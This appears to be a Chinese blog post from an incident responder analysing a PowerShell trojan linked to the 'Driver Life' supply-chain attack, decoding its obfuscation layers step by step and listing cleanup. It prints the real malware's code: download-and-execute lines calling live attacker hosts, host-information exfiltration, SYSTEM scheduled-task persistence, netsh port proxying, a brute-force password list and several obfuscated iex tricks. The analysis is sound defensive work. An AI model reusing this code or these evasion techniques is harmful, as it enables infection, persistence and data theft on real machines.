驱动人生某样本分析

发布时间:March 10, 2019 // 分类:运维工作,linux,windows // No Comments

今日某应急中遭遇到了驱动人生木马,对其中对一个powershell脚本进行了分析,发现挺有意思对 。该后门在原本的基础上进行了延伸,除了常规的内网端口扫描,smb弱口令爆破,hash传递攻击还加入了17010漏洞扫描的功能。

利用某大佬的话来说。由于木马是样本都是不落地的方式,核心技术是通过定时计划任务执行powershell代码达到持续控制的目的,因此最先分析powershell代码,了解它做了哪些动作,指定查杀手段。

最初的时候是发现在计划任务里面有一个

powershell" -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

对其进行解密

echo SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= |base64 -D

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)%

主要是获取当前的机器名称来匹配http://v.beahh.com/v{name} 。随意构造一个来获取

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

需要对这串看不懂的东西进程解密。在powershell里面Invoke-Expression是可以把任何字符都当成PowerShell脚本来执行。确实是创建动态执行的好东西。直接更改Invoke-Expression为Write-Host即可.(有些类似于php里面的万能的echo)

解密出来发现还是被加密了

着重看后面的

Gqw+Gqw{)1- tg- )','
4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[s
trING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|&((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')

在powershell里面执行了一次

PS >((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex

既然是iex就好办了。继续输出Write-Host

4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[strING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|& Write-Host


仔细观察了半天,发现这个( $eNV:cOmSpec[4,24,25]-JoIN'')里面的env很可疑,应该是一个获取系统环境变量的东西。继续在powershell运行查看是什么

好吧,还是iex.既然是iex就好办了。继续输出Write-Host

4FX4FX = valfs]gnir'+'ts['((") ; [aRray]::reverse( ( VARiABlE ('7XP8'+'0') -VA )) ;
Write-Host ( " $( $ofS ='') " + [stRiNG](( VARiABlE ('7XP8'+'0') -VA ) )+" $( SEt-ITEM 'VariABLE:OFs'  ' ' ) " ) 

执行后明显可以看到一些东西了。比如创建任务和下载东西

但是被混淆了。还需要继续解密。

') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | .( $ShelLiD[1]+$sHELlid[13]+'X')

主要是这个.( $ShelLiD[1]+$sHELlid[13]+'X')长的太像iex了。只是更改试试

果不其然,还是iex.继续继续输出Write-Host

') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | Write-Host

执行后成功的拿到了没有混淆的源码

[string]$av = ""
[string]$avs = ""
[string]$log1 = ""
[string]$log2 = ""
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
$av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
#[System.Threading.Thread]::Sleep((Get-Random -Minimum 10000 -Maximum 100000))
$path = "$env:temp\\ppppp.log"
[string]$flag = test-path $path
try{
$log1 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-7) -befor (get-date).AddDays(-3)).length
$log2 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-2)).length
}catch{}
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&log1=" + $log1 + "&log2=" + $log2
if($flag -eq 'False'){
    try{
        $file = "$env:appdata\\Microsoft\\cred.ps1"
        $size = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
        if($size -ne 2997721){
            $url = 'http://27.102.107.137/new.dat?pebb' + $key
            (New-Object System.Net.WebClient).DownloadFile($url,"$file")
            $size2 = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
            if($size2 -eq 2997721){
                $status = 'add_ok'
                if (([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
                &cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }else{
                &cmd.exe /c schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }
            }else{$status = 'error'}

        }else{      $status = 'old1'        }       New-Item $path -type file   }catch{}}else{$status = 'old2'}
try{    $download = 'http://27.102.107.137/status.json?pebb' + $key  + "&" + $status  + "&" + $MyInvocation.MyCommand.Definition    IEX (New-Object Net.WebClient).DownloadString("$download")}catch{}
try{
    &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f
}catch{}
[System.Threading.Thread]::Sleep(3000)
Stop-Process -Force -processname powershell

主要的功能是获取当前的mac地址等基本信息,然后检测是不是存在360主动防御服务等类似的防病毒软件。然后下载http://27.102.107.137/new.dat 到本地appdata\Microsoft\cred.ps1。添加计划任务Credentials和\Microsoft\Credentials。

紧接着对http://27.102.107.137/status.json 进行分析,使用同样的方式进行还原。

[string]$av = ""[string]$avs = ""[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayNameif($avs.GetType().name.IndexOf('Object') -gt -1)    for($v = 0; $v -lt $avs.Count; $v++){       $av += $avs[$v] + "|"   }}else{$av = $avs}try{  if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){       $av += 'ZDFY'   }}catch{}$path1 = "$env:temp\\ddd.tmp"[string]$ddd = test-path $path1$status = 'problem'$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&kill=" + $tkill + "&status="if($av.IndexOf("ZDFY") -ne -1){  $status = 'ZDFY'}elseif(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -and ($ddd -eq 'False')){   try{        New-Item $path1 -type file      $url = 'http://27.102.107.137/ddd.png?p=ddd' + $key     $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))       $pnamepath = $pname + '.exe'        $pnamepath = "$env:SystemRoot\" + $pnamepath        $wc = New-Object System.Net.WebClient       $wc.DownloadFile($url, $pnamepath)      $status = 'error'       $dsize = (Get-ChildItem $pnamepath -Force -recurse | Measure-Object -property length -sum).sum      if($dsize -eq '1634984'){       &cmd.exe /c schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F     $status = 'addok'       }   }catch{}}elseif($ddd -ne 'False'){  $status = 'old'}else{   $status = 'Low'}New-Item $path1 -type filetry{  $download = 'http://27.102.107.137/ddd.json?p=ddd' + $key + $status IEX (New-Object Net.WebClient).DownloadString("$download")  &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f}catch{}

利用同样的方式还原了http://27.102.107.137/new.dat

其中的一个base64里面包含了添加任务和端口策略的脚本

cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8AMwAyACcAKQA=

cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8ANgA0ACcAKQA=" /F


然后对10/172/192.168三个段特别上心。不然就访问https://api.ipify.org/ 获取公网Ip进行扫描
自带的弱口令

WmicUSER = @("administrator")
allpass = @("123456","password","PASSWORD","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@$$w0rd","P@$$word","P@$$w0rd","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator")

内置了17010漏洞扫描

主要是学会了学会了不同的iex写法

PS C:\Users\Administrator\Desktop> ((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex
PS C:\Users\Administrator\Desktop> ( $eNV:cOmSpec[4,24,25]-JoIN'')
iex
PS C:\Users\Administrator\Desktop> ( $ShelLiD[1]+$sHELlid[13]+'X')
ieX
PS C:\Users\Administrator\Desktop> $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))
PS C:\Users\Administrator\Desktop> $pname
wvhni
PS C:\Users\Administrator\Desktop> ((vaRIABlE '*MDR*').NAme[3,11,2]-JoIn'')
iex
PS C:\Users\Administrator\Desktop> .( $pSHoME[4]+$pshOME[34]+'X')

cmdlet Invoke-Expression at command pipeline position 1
Supply values for the following parameters:
Command: .( $pSHoME[4]+$pshOME[34]+'X')
PS C:\Users\Administrator\Desktop> ( $pSHoME[4]+$pshOME[34]+'X')
ieX

相关的计划任务差不多齐了,清理掉

schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr 

schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr 

schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1"

schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F

需要清理掉相关文件如下

\AppData\Roaming\sign.txt
\AppData\Roaming\flashplayer.tmp
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk
%systemroot%\xxx.exe[xxx为随机数]`[-join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))]`

提供解密后的部分下载
new.dat
status.json
v

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...